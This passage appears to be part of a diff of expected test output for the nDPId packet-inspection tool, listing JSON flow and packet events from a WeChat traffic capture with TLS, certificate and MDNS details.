{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1492167697384,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167697384,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} -00693{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167338426,"flow_last_seen":1492167713329,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167713329,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
-00702{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1113,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167338426,"flow_last_seen":1492167713329,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167713329,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720101,"flow_last_seen":1492167720101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720101,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1492167720101,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720101,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8R8JAAEAGzXrAqAFny82XotNnAbsR+WetAAAAAKACchBBBgAAAgQFtAQCCAoAMiBvAAAAAAEDAwc="} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720353,"flow_last_seen":1492167720353,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720353,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1492167720353,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720353,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8TqBAAEAGxpzAqAFny82XotNoAbuP9m4OAAAAAKACchC8ZwAAAgQFtAQCCAoAMiCuAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1492167720458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720458,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702cUBmdaEflnrqASN8gU+wAAAgQFoAQCCApFrqVHADIgbwEDAwc="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1492167720458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R8NAAEAGzYHAqAFny82XotNnAbsR+WeuFAZnW4AQAOV6PQAAAQEICgAyIMhFrqVH"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1492167720700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720700,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702hvZooej\/ZuD6ASN8iscAAAAgQFoAQCCApF0wrqADIgrgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1492167720700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720700,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0TqFAAEAGxqPAqAFny82XotNoAbuP9m4Pb2aKH4AQAOURtQAAAQEICgAyIQVF0wrq"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
